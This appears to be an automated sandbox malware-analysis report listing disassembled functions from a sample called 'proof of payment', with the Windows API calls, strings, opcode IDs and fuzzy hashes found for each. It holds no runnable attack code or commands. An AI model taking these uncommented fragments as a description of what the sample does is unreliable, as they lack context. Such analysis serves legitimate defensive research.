                                      • memset.MSVCRT ref: 00417B7B
                                      • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                      • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                      • GetLastError.KERNEL32 ref: 00417BB5
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: File$ErrorLastLockUnlockmemset
                                      • String ID:
                                      • API String ID: 3727323765-0
                                      • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                      • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                      • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                      • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004173E4 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                      Download Yara Rule
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                      • malloc.MSVCRT ref: 00417407
                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                      • ??3@YAXPAX@Z.MSVCRT ref: 00417425
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$??3@malloc
                                      • String ID:
                                      • API String ID: 4284152360-0
                                      • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                      • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                      • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                      • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040F64E Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 0040F673
                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                      • strlen.MSVCRT ref: 0040F6A2
                                      • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                      • String ID:
                                      • API String ID: 2754987064-0
                                      • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                      • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                      • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                      • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040F6BD Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 0040F6E2
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                      • strlen.MSVCRT ref: 0040F70D
                                      • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                      • String ID:
                                      • API String ID: 2754987064-0
                                      • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                      • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                      • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                      • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041437B Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                        • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                        • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                      • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                      • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                      • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                      • GetStockObject.GDI32(00000000), ref: 004143C6
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                      • String ID:
                                      • API String ID: 764393265-0
                                      • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                      • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                      • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                      • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040A751 Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                      • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                      • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: Time$System$File$LocalSpecific
                                      • String ID:
                                      • API String ID: 979780441-0
                                      • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                      • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                      • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                      • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004134C6 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                      Download Yara Rule
                                      APIs
                                      • memcpy.MSVCRT ref: 004134E0
                                      • memcpy.MSVCRT ref: 004134F2
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                      • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memcpy$DialogHandleModuleParam
                                      • String ID:
                                      • API String ID: 1386444988-0
                                      • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                      • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                      • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                      • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00411D08 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                      • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: InvalidateMessageRectSend
                                      • String ID: d=E
                                      • API String ID: 909852535-3703654223
                                      • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                      • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                      • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                      • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040F75C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                      Download Yara Rule
                                      APIs
                                      • wcschr.MSVCRT ref: 0040F79E
                                      • wcschr.MSVCRT ref: 0040F7AC
                                        • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                        • Part of subcall function 0040AA8C: memcpy.MSVCRT ref: 0040AACB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: wcschr$memcpywcslen
                                      • String ID: "
                                      • API String ID: 1983396471-123907689
                                      • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                      • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                      • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                      • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040A353 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: _snwprintfmemcpy
                                      • String ID: %2.2X
                                      • API String ID: 2789212964-323797159
                                      • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                      • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                      • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                      • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040F9B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: _snwprintf
                                      • String ID: %%-%d.%ds
                                      • API String ID: 3988819677-2008345750
                                      • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                      • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                      • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                      • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040E758 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 0040E770
                                      • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: MessageSendmemset
                                      • String ID: F^@
                                      • API String ID: 568519121-3652327722
                                      • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                      • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                      • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                      • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004018DB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: PlacementWindowmemset
                                      • String ID: WinPos
                                      • API String ID: 4036792311-2823255486
                                      • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                      • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                      • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                      • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040DCE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                      • wcsrchr.MSVCRT ref: 0040DCE9
                                      • wcscat.MSVCRT ref: 0040DCFF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: FileModuleNamewcscatwcsrchr
                                      • String ID: _lng.ini
                                      • API String ID: 383090722-1948609170
                                      • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                      • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                      • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                      • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00414B81 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                      • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                      • String ID: SHGetSpecialFolderPathW$shell32.dll
                                      • API String ID: 2773794195-880857682
                                      • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                      • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                      • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                      • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0042B9BD Relevance: 5.2, APIs: 4, Instructions: 181COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memcpy$memset
                                      • String ID:
                                      • API String ID: 438689982-0
                                      • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                      • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                      • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                      • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040E820 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ??2@$memset
                                      • String ID:
                                      • API String ID: 1860491036-0
                                      • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                      • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                      • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                      • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00408ADC Relevance: 5.1, APIs: 4, Instructions: 63COMMON
                                      Download Yara Rule
                                      APIs
                                      • memcmp.MSVCRT ref: 00408AF3
                                        • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                                        • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408ABB
                                        • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408AD0
                                      • memcmp.MSVCRT ref: 00408B2B
                                      • memcmp.MSVCRT ref: 00408B5C
                                      • memcpy.MSVCRT ref: 00408B79
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memcmp$memcpy
                                      • String ID:
                                      • API String ID: 231171946-0
                                      • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                      • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                      • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                      • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00409D1F Relevance: 5.0, APIs: 4, Instructions: 32COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: wcslen$wcscat$wcscpy
                                      • String ID:
                                      • API String ID: 1961120804-0
                                      • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                      • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                      • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                      • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E
                                      Uniqueness

                                      Uniqueness Score: -1.00%